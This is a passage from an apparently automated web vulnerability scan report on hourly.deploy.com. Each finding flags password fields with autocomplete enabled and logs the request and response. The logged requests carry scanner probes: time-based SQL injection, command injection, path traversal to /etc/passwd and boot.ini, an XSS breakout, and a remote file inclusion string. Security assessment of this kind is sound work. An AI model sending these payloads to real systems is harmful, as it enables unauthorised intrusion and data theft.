Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.77. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1NS_NO

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1NS_NO HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1NS_NO" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.78. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=//www.netsparker.com?

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=//www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=//www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.79. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.80. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=SELECT%20SLEEP(25)--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.81. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.82. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../boot.ini%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.83. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.84. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27%26expr%20268409241%20-%202%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.85. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../var/log/apache2/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.86. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.87. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.88. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=php://filter//resource=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.89. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.90. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.91. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.92. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.93. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
